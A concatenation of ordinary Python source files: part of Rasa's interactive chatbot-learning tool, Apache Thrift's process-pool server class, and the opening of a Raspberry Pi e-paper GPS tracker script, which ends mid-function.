return _table.column_max_width(3)
def add_bot_cell(data, cell):
data.append([len(data), Color(cell), "", ""])
def add_user_cell(data, cell):
data.append([len(data), "", "", Color(cell)])
# prints the historical interactions between the bot and the user,
# to help with correctly identifying the action
table_data = [
[
"# ",
Color(colored("Bot ", "autoblue")),
" ",
Color(colored("You ", "hired")),
]
]
table = SingleTable(table_data, "Chat History")
bot_column = []
tracker = DialogueStateTracker.from_dict("any", events)
applied_events = tracker.applied_events()
for idx, event in enumerate(applied_events):
if isinstance(event, ActionExecuted):
bot_column.append(colored(event.action_name, "autocyan"))
if event.confidence is not None:
bot_column[-1] += colored(
" {:03.2f}".format(event.confidence), "autowhite"
)
elif isinstance(event, UserUttered):
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
bot_column = []
msg = format_user_msg(event, user_width(table))
add_user_cell(table_data, msg)
elif isinstance(event, BotUttered):
wrapped = wrap(format_bot_output(event), bot_width(table))
bot_column.append(colored(wrapped, "autoblue"))
else:
if event.as_story_string():
bot_column.append(wrap(event.as_story_string(), bot_width(table)))
if bot_column:
text = "\n".join(bot_column)
add_bot_cell(table_data, text)
table.inner_heading_row_border = False
table.inner_row_border = True
table.inner_column_border = False
table.outer_border = False
table.justify_columns = {0: "left", 1: "left", 2: "center", 3: "right"}
return table.table
def _slot_history(tracker_dump: Dict[Text, Any]) -> List[Text]:
"""Create an array of slot representations to be displayed."""
slot_strs = []
for k, s in tracker_dump.get("slots", {}).items():
colored_value = cliutils.wrap_with_color(
str(s), color=rasa.cli.utils.bcolors.WARNING
)
slot_strs.append("{}: {}".format(k, colored_value))
return slot_strs
async def _write_data_to_file(sender_id: Text, endpoint: EndpointConfig):
"""Write stories and nlu data to file."""
story_path, nlu_path, domain_path = _request_export_info()
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
serialised_domain = await retrieve_domain(endpoint)
domain = Domain.from_dict(serialised_domain)
await _write_stories_to_file(story_path, events, domain)
await _write_nlu_to_file(nlu_path, events)
await _write_domain_to_file(domain_path, events, domain)
logger.info("Successfully wrote stories and NLU data")
async def _ask_if_quit(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Display the exit menu.
Return `True` if the previous question should be retried."""
answer = questionary.select(
message="Do you want to stop?",
choices=[
Choice("Continue", "continue"),
Choice("Undo Last", "undo"),
Choice("Fork", "fork"),
Choice("Start Fresh", "restart"),
Choice("Export & Quit", "quit"),
],
).ask()
if not answer or answer == "quit":
# this is also the default answer if the user presses Ctrl-C
await _write_data_to_file(sender_id, endpoint)
raise Abort()
elif answer == "continue":
# in this case we will just return, and the original
# question will get asked again
return True
elif answer == "undo":
raise UndoLastStep()
elif answer == "fork":
raise ForkTracker()
elif answer == "restart":
raise RestartConversation()
async def _request_action_from_user(
predictions: List[Dict[Text, Any]], sender_id: Text, endpoint: EndpointConfig
) -> Tuple[Text, bool]:
"""Ask the user to correct an action prediction."""
await _print_history(sender_id, endpoint)
choices = [
{
"name": "{:03.2f} {:40}".format(a.get("score"), a.get("action")),
"value": a.get("action"),
}
for a in predictions
]
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
session_actions_all = [a["name"] for a in _collect_actions(events)]
session_actions_unique = list(set(session_actions_all))
old_actions = [action["value"] for action in choices]
new_actions = [
{"name": action, "value": OTHER_ACTION + action}
for action in session_actions_unique
if action not in old_actions
]
choices = (
[{"name": "<create new action>", "value": NEW_ACTION}] + new_actions + choices
)
question = questionary.select("What is the next action of the bot?", choices)
action_name = await _ask_questions(question, sender_id, endpoint)
is_new_action = action_name == NEW_ACTION
if is_new_action:
# create new action
action_name = await _request_free_text_action(sender_id, endpoint)
if action_name.startswith(UTTER_PREFIX):
utter_message = await _request_free_text_utterance(
sender_id, endpoint, action_name
)
NEW_TEMPLATES[action_name] = {utter_message: ""}
elif action_name[:32] == OTHER_ACTION:
# action was newly created in the session, but not this turn
is_new_action = True
action_name = action_name[32:]
print ("Thanks! The bot will now run {}.\n".format(action_name))
return action_name, is_new_action
def _request_export_info() -> Tuple[Text, Text, Text]:
"""Request file path and export stories & nlu data to that path"""
# export training data and quit
questions = questionary.form(
export_stories=questionary.text(
message="Export stories to (if file exists, this "
"will append the stories)",
default=PATHS["stories"],
validate=io_utils.file_type_validator(
[".md"],
"Please provide a valid export path for the stories, e.g. 'stories.md'.",
),
),
export_nlu=questionary.text(
message="Export NLU data to (if file exists, this will "
"merge learned data with previous training examples)",
default=PATHS["nlu"],
validate=io_utils.file_type_validator(
[".md"],
"Please provide a valid export path for the NLU data, e.g. 'nlu.md'.",
),
),
export_domain=questionary.text(
message="Export domain file to (if file exists, this "
"will be overwritten)",
default=PATHS["domain"],
validate=io_utils.file_type_validator(
[".yml", ".yaml"],
"Please provide a valid export path for the domain file, e.g. 'domain.yml'.",
),
),
)
answers = questions.ask()
if not answers:
raise Abort()
return (answers["export_stories"], answers["export_nlu"], answers["export_domain"])
def _split_conversation_at_restarts(
events: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in events:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
def _collect_messages(events: List[Dict[Text, Any]]) -> List[Message]:
"""Collect the message text and parsed data from the UserMessage events
into a list"""
from rasa.nlu.extractors.duckling_http_extractor import DucklingHTTPExtractor
from rasa.nlu.extractors.mitie_entity_extractor import MitieEntityExtractor
from rasa.nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor
msgs = []
for event in events:
if event.get("event") == UserUttered.type_name:
data = event.get("parse_data", {})
for entity in data.get("entities", []):
excluded_extractors = [
DucklingHTTPExtractor.__name__,
SpacyEntityExtractor.__name__,
MitieEntityExtractor.__name__,
]
logger.debug(
"Exclude entity marking of following extractors"
" {} when writing nlu data "
"to file.".format(excluded_extractors)
)
if entity.get("extractor") in excluded_extractors:
data["entities"].remove(entity)
msg = Message.build(data["text"], data["intent"]["name"], data["entities"])
msgs.append(msg)
elif event.get("event") == UserUtteranceReverted.type_name and msgs:
msgs.pop() # user corrected the nlu, remove incorrect example
return msgs
def _collect_actions(events: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
"""Collect all the `ActionExecuted` events into a list."""
return [evt for evt in events if evt.get("event") == ActionExecuted.type_name]
async def _write_stories_to_file(
export_story_path: Text, events: List[Dict[Text, Any]], domain: Domain
) -> None:
"""Write the conversation of the sender_id to the file paths."""
sub_conversations = _split_conversation_at_restarts(events)
io_utils.create_path(export_story_path)
if os.path.exists(export_story_path):
append_write = "a" # append if already exists
else:
append_write = "w" # make a new file if not
with open(export_story_path, append_write, encoding="utf-8") as f:
i = 1
for conversation in sub_conversations:
parsed_events = rasa.core.events.deserialise_events(conversation)
tracker = DialogueStateTracker.from_events(
"interactive_story_{}".format(i), evts=parsed_events, slots=domain.slots
)
if any(
isinstance(event, UserUttered) for event in tracker.applied_events()
):
i += 1
f.write("\n" + tracker.export_stories(SAVE_IN_E2E))
async def _write_nlu_to_file(
export_nlu_path: Text, events: List[Dict[Text, Any]]
) -> None:
"""Write the nlu data of the sender_id to the file paths."""
from rasa.nlu.training_data import TrainingData
msgs = _collect_messages(events)
# noinspection PyBroadException
try:
previous_examples = loading.load_data(export_nlu_path)
except Exception as e:
logger.debug(
"An exception occurred while trying to load the NLU data. {}".format(str(e))
)
# No previous file exists, use empty training data as replacement.
previous_examples = TrainingData()
nlu_data = previous_examples.merge(TrainingData(msgs))
# need to guess the format of the file before opening it to avoid a read
# in a write
if loading.guess_format(export_nlu_path) in {"md", "unk"}:
fformat = "md"
else:
fformat = "json"
with open(export_nlu_path, "w", encoding="utf-8") as f:
if fformat == "md":
f.write(nlu_data.nlu_as_markdown())
else:
f.write(nlu_data.nlu_as_json())
def _entities_from_messages(messages):
"""Return all entities that occur in atleast one of the messages."""
return list({e["entity"] for m in messages for e in m.data.get("entities", [])})
def _intents_from_messages(messages):
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
distinct_intents = {m.data["intent"] for m in messages if "intent" in m.data}
return distinct_intents
async def _write_domain_to_file(
domain_path: Text, events: List[Dict[Text, Any]], old_domain: Domain
) -> None:
"""Write an updated domain file to the file path."""
io_utils.create_path(domain_path)
messages = _collect_messages(events)
actions = _collect_actions(events)
templates = NEW_TEMPLATES
# TODO for now there is no way to distinguish between action and form
collected_actions = list(
{e["name"] for e in actions if e["name"] not in default_action_names()}
)
new_domain = Domain(
intents=_intents_from_messages(messages),
entities=_entities_from_messages(messages),
slots=[],
templates=templates,
action_names=collected_actions,
form_names=[],
)
old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(
endpoint: EndpointConfig,
sender_id: Text,
sender_ids: List[Text],
plot_file: Optional[Text],
) -> None:
"""Predict and validate actions until we need to wait for a user message."""
listen = False
while not listen:
result = await request_prediction(endpoint, sender_id)
predictions = result.get("scores")
probabilities = [prediction["score"] for prediction in predictions]
pred_out = int(np.argmax(probabilities))
action_name = predictions[pred_out].get("action")
policy = result.get("policy")
confidence = result.get("confidence")
await _print_history(sender_id, endpoint)
await _plot_trackers(
sender_ids, plot_file, endpoint, unconfirmed=[ActionExecuted(action_name)]
)
listen = await _validate_action(
action_name, policy, confidence, predictions, endpoint, sender_id
)
await _plot_trackers(sender_ids, plot_file, endpoint)
tracker_dump = await retrieve_tracker(
endpoint, sender_id, EventVerbosity.AFTER_RESTART
)
events = tracker_dump.get("events", [])
if len(events) >= 2:
last_event = events[-2] # last event before action_listen
# if bot message includes buttons the user will get a list choice to reply
# the list choice is displayed in place of action listen
if last_event.get("event") == BotUttered.type_name and last_event["data"].get(
"buttons", None
):
response = _get_button_choice(last_event)
if response != cliutils.FREE_TEXT_INPUT_PROMPT:
await send_message(endpoint, sender_id, response)
def _get_button_choice(last_event: Dict[Text, Any]) -> Text:
data = last_event["data"]
message = last_event.get("text", "")
choices = cliutils.button_choices_from_message_data(
data, allow_free_text_input=True
)
question = questionary.select(message, choices)
response = cliutils.payload_from_button_question(question)
return response
async def _correct_wrong_nlu(
corrected_nlu: Dict[Text, Any],
events: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> None:
"""A wrong NLU prediction got corrected, update core's tracker."""
revert_latest_user_utterance = UserUtteranceReverted().as_dict()
# `UserUtteranceReverted` also removes the `ACTION_LISTEN` event before, hence we
# have to replay it.
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
corrected_message = latest_user_message(events)
if corrected_message is None:
raise Exception("Failed to correct NLU data. User message not found.")
corrected_message["parse_data"] = corrected_nlu
await send_event(
endpoint,
sender_id,
[revert_latest_user_utterance, listen_for_next_message, corrected_message],
)
async def _correct_wrong_action(
corrected_action: Text,
endpoint: EndpointConfig,
sender_id: Text,
is_new_action: bool = False,
) -> None:
"""A wrong action prediction got corrected, update core's tracker."""
await send_action(
endpoint, sender_id, corrected_action, is_new_action=is_new_action
)
def _form_is_rejected(action_name, tracker):
"""Check if the form got rejected with the most recent action name."""
return (
tracker.get("active_form", {}).get("name")
and action_name != tracker["active_form"]["name"]
and action_name != ACTION_LISTEN_NAME
)
def _form_is_restored(action_name, tracker):
"""Check whether the form is called again after it was rejected."""
return (
tracker.get("active_form", {}).get("rejected")
and tracker.get("latest_action_name") == ACTION_LISTEN_NAME
and action_name == tracker.get("active_form", {}).get("name")
)
async def _confirm_form_validation(action_name, tracker, endpoint, sender_id):
"""Ask a user whether an input for a form should be validated.
Previous to this call, the active form was chosen after it was rejected."""
requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)
validation_questions = questionary.confirm(
"Should '{}' validate user input to fill "
"the slot '{}'?".format(action_name, requested_slot)
)
validate_input = await _ask_questions(validation_questions, sender_id, endpoint)
if not validate_input:
# notify form action to skip validation
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": False}
)
elif not tracker.get("active_form", {}).get("validate"):
# handle contradiction with learned behaviour
warning_question = questionary.confirm(
"ERROR: FormPolicy predicted no form validation "
"based on previous training stories. "
"Make sure to remove contradictory stories "
"from training data. "
"Otherwise predicting no form validation "
"will not work as expected."
)
await _ask_questions(warning_question, sender_id, endpoint)
# notify form action to validate an input
await send_event(
endpoint, sender_id, {"event": "form_validation", "validate": True}
)
async def _validate_action(
action_name: Text,
policy: Text,
confidence: float,
predictions: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
) -> bool:
"""Query the user to validate if an action prediction is correct.
Returns `True` if the prediction is correct, `False` otherwise."""
question = questionary.confirm(
"The bot wants to run '{}', correct?".format(action_name)
)
is_correct = await _ask_questions(question, sender_id, endpoint)
if not is_correct:
action_name, is_new_action = await _request_action_from_user(
predictions, sender_id, endpoint
)
else:
is_new_action = False
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
if _form_is_rejected(action_name, tracker):
# notify the tracker that form was rejected
await send_event(
endpoint,
sender_id,
{
"event": "action_execution_rejected",
"name": tracker["active_form"]["name"],
},
)
elif _form_is_restored(action_name, tracker):
await _confirm_form_validation(action_name, tracker, endpoint, sender_id)
if not is_correct:
await _correct_wrong_action(
action_name, endpoint, sender_id, is_new_action=is_new_action
)
else:
await send_action(endpoint, sender_id, action_name, policy, confidence)
return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
"""Display the parse data of a message in markdown format."""
from rasa.nlu.training_data.formats import MarkdownWriter
if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
return parse_data["text"]
if not parse_data.get("entities"):
parse_data["entities"] = []
# noinspection PyProtectedMember
return MarkdownWriter()._generate_message_md(parse_data)
def _validate_user_regex(latest_message: Dict[Text, Any], intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
if intent in intents:
return True
else:
return False
async def _validate_user_text(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> bool:
"""Validate a user message input as free text.
This assumes the user message is a text message (so NOT `/greet`)."""
parse_data = latest_message.get("parse_data", {})
text = _as_md_message(parse_data)
intent = parse_data.get("intent", {}).get("name")
entities = parse_data.get("entities", [])
if entities:
message = (
"Is the intent '{}' correct for '{}' and are "
"all entities labeled correctly?".format(intent, text)
)
else:
message = (
"Your NLU model classified '{}' with intent '{}'"
" and there are no entities, is this correct?".format(text, intent)
)
if intent is None:
print ("The NLU classification for '{}' returned '{}'".format(text, intent))
return False
else:
question = questionary.confirm(message)
return await _ask_questions(question, sender_id, endpoint)
async def _validate_nlu(
intents: List[Text], endpoint: EndpointConfig, sender_id: Text
) -> None:
"""Validate if a user message, either text or intent is correct.
If the prediction of the latest user message is incorrect,
the tracker will be corrected with the correct intent / entities."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.AFTER_RESTART)
latest_message = latest_user_message(tracker.get("events", [])) or {}
if latest_message.get("text", "").startswith( # pytype: disable=attribute-error
INTENT_MESSAGE_PREFIX
):
valid = _validate_user_regex(latest_message, intents)
else:
valid = await _validate_user_text(latest_message, endpoint, sender_id)
if not valid:
corrected_intent = await _request_intent_from_user(
latest_message, intents, sender_id, endpoint
)
# corrected intents have confidence 1.0
corrected_intent["confidence"] = 1.0
events = tracker.get("events", [])
entities = await _correct_entities(latest_message, endpoint, sender_id)
corrected_nlu = {
"intent": corrected_intent,
"entities": entities,
"text": latest_message.get("text"),
}
await _correct_wrong_nlu(corrected_nlu, events, endpoint, sender_id)
async def _correct_entities(
latest_message: Dict[Text, Any], endpoint: EndpointConfig, sender_id: Text
) -> List[Dict[Text, Any]]:
"""Validate the entities of a user message.
Returns the corrected entities"""
from rasa.nlu.training_data.formats import MarkdownReader
parse_original = latest_message.get("parse_data", {})
entity_str = _as_md_message(parse_original)
question = questionary.text(
"Please mark the entities using [value](type) notation", default=entity_str
)
annotation = await _ask_questions(question, sender_id, endpoint)
# noinspection PyProtectedMember
parse_annotated = MarkdownReader()._parse_training_example(annotation)
corrected_entities = _merge_annotated_and_original_entities(
parse_annotated, parse_original
)
return corrected_entities
def _merge_annotated_and_original_entities(parse_annotated, parse_original):
# overwrite entities which have already been
# annotated in the original annotation to preserve
# additional entity parser information
entities = parse_annotated.get("entities", [])[:]
for i, entity in enumerate(entities):
for original_entity in parse_original.get("entities", []):
if _is_same_entity_annotation(entity, original_entity):
entities[i] = original_entity
break
return entities
def _is_same_entity_annotation(entity, other):
return entity["value"] == other["value"] and entity["entity"] == other["entity"]
async def _enter_user_message(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Request a new message from the user."""
question = questionary.text("Your input ->")
message = await _ask_questions(question, sender_id, endpoint, lambda a: not a)
if message == (INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART):
raise RestartConversation()
await send_message(endpoint, sender_id, message)
async def is_listening_for_message(sender_id: Text, endpoint: EndpointConfig) -> bool:
"""Check if the conversation is in need for a user message."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.APPLIED)
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") == UserUttered.type_name:
return False
elif e.get("event") == ActionExecuted.type_name:
return e.get("name") == ACTION_LISTEN_NAME
return False
async def _undo_latest(sender_id: Text, endpoint: EndpointConfig) -> None:
"""Undo either the latest bot action or user message, whatever is last."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.ALL)
# Get latest `UserUtterance` or `ActionExecuted` event.
last_event_type = None
for i, e in enumerate(reversed(tracker.get("events", []))):
last_event_type = e.get("event")
if last_event_type in {ActionExecuted.type_name, UserUttered.type_name}:
break
elif last_event_type == Restarted.type_name:
break
if last_event_type == ActionExecuted.type_name:
undo_action = ActionReverted().as_dict()
await send_event(endpoint, sender_id, undo_action)
elif last_event_type == UserUttered.type_name:
undo_user_message = UserUtteranceReverted().as_dict()
listen_for_next_message = ActionExecuted(ACTION_LISTEN_NAME).as_dict()
await send_event(
endpoint, sender_id, [undo_user_message, listen_for_next_message]
)
async def _fetch_events(
sender_ids: List[Union[Text, List[Event]]], endpoint: EndpointConfig
) -> List[List[Event]]:
"""Retrieve all event trackers from the endpoint for all sender ids."""
event_sequences = []
for sender_id in sender_ids:
if isinstance(sender_id, str):
tracker = await retrieve_tracker(endpoint, sender_id)
events = tracker.get("events", [])
for conversation in _split_conversation_at_restarts(events):
parsed_events = rasa.core.events.deserialise_events(conversation)
event_sequences.append(parsed_events)
else:
event_sequences.append(sender_id)
return event_sequences
async def _plot_trackers(
sender_ids: List[Union[Text, List[Event]]],
output_file: Optional[Text],
endpoint: EndpointConfig,
unconfirmed: Optional[List[Event]] = None,
):
"""Create a plot of the trackers of the passed sender ids.
This assumes that the last sender id is the conversation we are currently
working on. If there are events that are not part of this active tracker
yet, they can be passed as part of `unconfirmed`. They will be appended
to the currently active conversation."""
if not output_file or not sender_ids:
# if there is no output file provided, we are going to skip plotting
# same happens if there are no sender ids
return None
event_sequences = await _fetch_events(sender_ids, endpoint)
if unconfirmed:
event_sequences[-1].extend(unconfirmed)
graph = await visualize_neighborhood(
event_sequences[-1], event_sequences, output_file=None, max_history=2
)
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
"""Print some initial help message for the user."""
if not skip_visualization:
visualization_url = DEFAULT_SERVER_FORMAT.format(
"http", DEFAULT_SERVER_PORT + 1
)
visualization_help = "Visualisation at {}/visualization.html.".format(
visualization_url
)
else:
visualization_help = ""
rasa.cli.utils.print_success(
"Bot loaded. {}\n"
"Type a message and press enter "
"(press 'Ctr-c' to exit). "
"".format(visualization_help)
)
async def record_messages(
endpoint: EndpointConfig,
sender_id: Text = UserMessage.DEFAULT_SENDER_ID,
max_message_limit: Optional[int] = None,
stories: Optional[Text] = None,
skip_visualization: bool = False,
):
"""Read messages from the command line and print bot responses."""
from rasa.core import training
try:
_print_help(skip_visualization)
try:
domain = await retrieve_domain(endpoint)
except ClientError:
logger.exception(
"Failed to connect to Rasa Core server at '{}'. "
"Is the server running?".format(endpoint.url)
)
return
trackers = await training.load_data(
stories,
Domain.from_dict(domain),
augmentation_factor=0,
use_story_concatenation=False,
)
intents = [next(iter(i)) for i in (domain.get("intents") or [])]
num_messages = 0
sender_ids = [t.events for t in trackers] + [sender_id]
if not skip_visualization:
plot_file = "story_graph.dot"
await _plot_trackers(sender_ids, plot_file, endpoint)
else:
plot_file = None
while not utils.is_limit_reached(num_messages, max_message_limit):
try:
if await is_listening_for_message(sender_id, endpoint):
await _enter_user_message(sender_id, endpoint)
await _validate_nlu(intents, endpoint, sender_id)
await _predict_till_next_listen(
endpoint, sender_id, sender_ids, plot_file
)
num_messages += 1
except RestartConversation:
await send_event(endpoint, sender_id, Restarted().as_dict())
await send_event(
endpoint, sender_id, ActionExecuted(ACTION_LISTEN_NAME).as_dict()
)
logger.info("Restarted conversation, starting a new one.")
except UndoLastStep:
await _undo_latest(sender_id, endpoint)
await _print_history(sender_id, endpoint)
except ForkTracker:
await _print_history(sender_id, endpoint)
events_fork = await _request_fork_from_user(sender_id, endpoint)
await send_event(endpoint, sender_id, Restarted().as_dict())
if events_fork:
for evt in events_fork:
await send_event(endpoint, sender_id, evt)
logger.info("Restarted conversation at fork.")
await _print_history(sender_id, endpoint)
await _plot_trackers(sender_ids, plot_file, endpoint)
except Abort:
return
except Exception:
logger.exception("An exception occurred while recording messages.")
raise
def _serve_application(app, stories, skip_visualization):
"""Start a core server and attach the interactive learning IO."""
endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)
async def run_interactive_io(running_app: Sanic):
"""Small wrapper to shut down the server once cmd io is done."""
await record_messages(
endpoint=endpoint,
stories=stories,
skip_visualization=skip_visualization,
sender_id=uuid.uuid4().hex,
)
logger.info("Killing Sanic server now.")
running_app.stop() # kill the sanic server
app.add_task(run_interactive_io)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT)
return app
def start_visualization(image_path: Text = None) -> None:
"""Add routes to serve the conversation visualization files."""
app = Sanic(__name__)
# noinspection PyUnusedLocal
@app.exception(NotFound)
async def ignore_404s(request, exception):
return response.text("Not found", status=404)
# noinspection PyUnusedLocal
@app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
def visualisation_html(request):
return response.file(visualization.visualization_html_path())
# noinspection PyUnusedLocal
@app.route("/visualization.dot", methods=["GET"])
def visualisation_png(request):
try:
headers = {"Cache-Control": "no-cache"}
return response.file(os.path.abspath(image_path), headers=headers)
except FileNotFoundError:
return response.text("", 404)
update_sanic_log_level()
app.run(host="0.0.0.0", port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(args, endpoints, additional_arguments, app, loop):
_interpreter = NaturalLanguageInterpreter.create(args.get("nlu"), endpoints.nlu)
model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))
_agent = await train(
args.get("domain"),
args.get("stories"),
model_directory,
_interpreter,
endpoints,
args.get("dump_stories"),
args.get("config")[0],
None,
additional_arguments,
)
app.agent = _agent
async def wait_til_server_is_running(endpoint, max_retries=30, sleep_between_retries=1):
"""Try to reach the server, retry a couple of times and sleep in between."""
while max_retries:
try:
r = await retrieve_status(endpoint)
logger.info("Reached core: {}".format(r))
if not r.get("is_ready"):
# server did not finish loading the agent yet
# in this case, we need to wait till the model trained
# so we might be sleeping for a while...
await asyncio.sleep(sleep_between_retries)
continue
else:
# server is ready to go
return True
except ClientError:
max_retries -= 1
if max_retries:
await asyncio.sleep(sleep_between_retries)
return False
def run_interactive_learning(
stories: Text = None,
skip_visualization: bool = False,
server_args: Dict[Text, Any] = None,
additional_arguments: Dict[Text, Any] = None,
):
"""Start the interactive learning with the model of the agent."""
global SAVE_IN_E2E
server_args = server_args or {}
if server_args.get("nlu_data"):
PATHS["nlu"] = server_args["nlu_data"]
if server_args.get("stories"):
PATHS["stories"] = server_args["stories"]
if server_args.get("domain"):
PATHS["domain"] = server_args["domain"]
SAVE_IN_E2E = server_args["e2e"]
if not skip_visualization:
p = Process(target=start_visualization, args=("story_graph.dot",))
p.daemon = True
p.start()
else:
p = None
app = run.configure_app(enable_api=True)
endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))
# before_server_start handlers make sure the agent is loaded before the
# interactive learning IO starts
if server_args.get("model"):
app.register_listener(
partial(run.load_agent_on_start, server_args.get("model"), endpoints, None),
"before_server_start",
)
else:
app.register_listener(
partial(train_agent_on_start, server_args, endpoints, additional_arguments),
"before_server_start",
)
_serve_application(app, stories, skip_visualization)
if not skip_visualization and p is not None:
p.terminate() # pytype: disable=attribute-error
p.join() # pytype: disable=attribute-error
|
TProcessPoolServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
from multiprocessing import Process, Value, Condition
from lib.thrift.server import TServer
from thrift.transport.TTransport import TTransportException
class TProcessPoolServer(TServer):
"""Server with a fixed size pool of worker subprocesses to service requests
Note that if you need shared state between the handlers - it's up to you!
Written by Dvir Volk, doat.com
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.numWorkers = 10
self.workers = []
self.isRunning = Value('b', False)
self.stopCondition = Condition()
self.postForkCallback = None
def setPostForkCallback(self, callback):
if not callable(callback):
raise TypeError("This is not a callback!")
self.postForkCallback = callback
def setNumWorkers(self, num):
"""Set the number of worker threads that should be created"""
self.numWorkers = num
def workerProcess(self):
"""Loop getting clients from the shared queue and process them"""
if self.postForkCallback:
self.postForkCallback()
while self.isRunning.value:
try:
client = self.serverTransport.accept()
self.serveClient(client)
except (KeyboardInterrupt, SystemExit):
return 0
except Exception, x:
logging.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransportException, tx:
pass
except Exception, x:
logging.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start workers and put into queue"""
# this is a shared state that can tell the workers to exit when False
self.isRunning.value = True
# first bind and listen to the port
self.serverTransport.listen()
# fork the children
for i in range(self.numWorkers):
try:
w = Process(target=self.workerProcess)
w.daemon = True
w.start()
self.workers.append(w)
except Exception, x:
logging.exception(x)
# wait until the condition is set by stop()
while True:
self.stopCondition.acquire()
try:
self.stopCondition.wait()
break
except (SystemExit, KeyboardInterrupt):
break
except Exception, x:
logging.exception(x)
self.isRunning.value = False
def stop(self):
self.isRunning.value = False
self.stopCondition.acquire()
self.stopCondition.notify()
self.stopCondition.release()
|
app_tracker.py
|
#!/usr/bin/env python3
from __future__ import print_function
import os
import sys
import string
from papirus import Papirus
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from time import sleep
import RPi.GPIO as GPIO
from datetime import datetime
import threaded_get_gps_from_port as tggp
import threading
def collect_gps(papirus,SIZE):
# thread to open a new file, start writing and spawn the
# other thread to collect gps data from the port.
# Start tracking.
write_text(papirus, "Beginning tracking...", SIZE)
location_file = '/home/pi/location'+datetime.now().strftime('%Y%m%d%H%M%S')+'.txt'
gpsp = tggp.GpsPoller()
gpsp.start()
gps_attribs = ['time','alt','lon','lat']
while True:
try:
with open(location_file,'a+') as lf:
result = gpsp.get_current_value()
if all(getattr(result,attr) for attr in gps_attribs):
lf.write(str(result.alt)+","+str(result.lat)+","+str(result.lon)+","+str(result.time)+"\n")
# In the main thread, every 5 seconds print the current value
sleep(5)
except AttributeError:
sleep(2)
except KeyboardInterrupt:
quit()
# Check EPD_SIZE is defined
EPD_SIZE=0.0
if os.path.exists('/etc/default/epd-fuse'):
exec(open('/etc/default/epd-fuse').read())
if EPD_SIZE == 0.0:
print("Please select your screen size by running 'papirus-config'.")
sys.exit()
# Running as root only needed for older Raspbians without /dev/gpiomem
if not (os.path.exists('/dev/gpiomem') and os.access('/dev/gpiomem', os.R_OK | os.W_OK)):
user = os.getuid()
if user != 0:
print('Please run script as root')
sys.exit()
# Command line usage
# papirus-buttons
hatdir = '/proc/device-tree/hat'
WHITE = 1
BLACK = 0
SIZE = 27
# Assume Papirus Zero
SW1 = 21
SW2 = 16
SW3 = 20
SW4 = 19
SW5 = 26
# Check for HAT, and if detected redefine SW1 .. SW5
if (os.path.exists(hatdir + '/product')) and (os.path.exists(hatdir + '/vendor')) :
with open(hatdir + '/product') as f :
prod = f.read()
with open(hatdir + '/vendor') as f :
vend = f.read()
if (prod.find('PaPiRus ePaper HAT') == 0) and (vend.find('Pi Supply') == 0) :
# Papirus HAT detected
SW1 = 16
SW2 = 26
SW3 = 20
SW4 = 21
SW5 = -1
def main(argv):
global SIZE
GPIO.setmode(GPIO.BCM)
GPIO.setup(SW1, GPIO.IN)
GPIO.setup(SW2, GPIO.IN)
GPIO.setup(SW3, GPIO.IN)
GPIO.setup(SW4, GPIO.IN)
if SW5 != -1:
GPIO.setup(SW5, GPIO.IN)
